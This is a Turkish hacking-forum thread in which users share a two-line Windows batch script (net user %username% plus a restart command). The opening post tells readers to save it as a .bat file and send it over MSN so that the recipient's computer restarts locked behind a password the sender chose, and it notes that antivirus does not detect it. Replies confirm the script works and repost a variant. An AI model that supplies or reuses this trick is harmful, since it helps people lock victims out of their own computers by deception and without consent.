Bu kod gercekten bilgisayara sifre koyarmı

26 May 2010
84
0
arkadslar merak ettim bir bilgisaarı sifrelemek bu kadar kolaymı ustelik kod olduğundan mesala esed nod 32 2011 bunu virüs olarakda algılamıor bi,rde siz vbakın eğer bu gercekten ise yarıorsa benimde isime yarıyacakda :)

net user %username% ekinji
shutdown -r

Bir not defteri açıp yukarıda verdiğim kodu yazın!..
"ekinji" yazan yere istediğinizi yazabilirsiniz!.. ( Şifre yani )
Kaydet dediğinizde uzantısını .bat yapın!... msn den birine gönderin

Gönderdiğiniz kişi açarsa sistem güvenlik uyarısı çıkıp 30 saniye içerisinde otomatik olarak restart atıyor!...

Bilgisayar açıldığında koyduğunuz şifre devrede!...

adviance

Üye
15 Haz 2011
165
0
Username kısmını felan doldurcak mıyız bide ? ee eğer öyleyse karşı tarafın bilgisayar adını nerden bileceğiz ?

13 Kas 2010
231
0
bir yönetici olarak cmd yi çalıştımassanız tabiki şifre değişmez
iki kod çok iyi çalışıyor bunla program bile yaptım ben
örnek verim
yenimetin belgesi açın
içine bunları ekleyin

@echo off
net user %username% 123456

farklı kaydet degis.bat olarak kaydedin

sonra windows7 dedkiler yönetici olarak xp dekiler normal çalıştırsınlar oturumu kapatın bakalım şifre isticek şifrenizde 123456

Son düzenleme:

baypars

Katılımcı Üye
5 Eyl 2010
485
0
bir yönetici olarak cmd yi çalıştımassanız tabiki şifre değişmez
iki kod çok iyi çalışıyor bunla program bile yaptım ben
örnek verim
yenimetin belgesi açın
içine bunları ekleyin

@echo off
net user %username% 123456

farklı kaydet degis.bat olarak kaydedin

sonra windows7 dedkiler yönetici olarak xp dekiler normal çalıştırsınlar oturumu kapatın bakalım şifre isticek şifrenizde 123456

Aynen bu kod kesinlikle çalışır zamanında çok kullandım :) username kısmını bilgisayar kendisi bulur merak etme :)

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.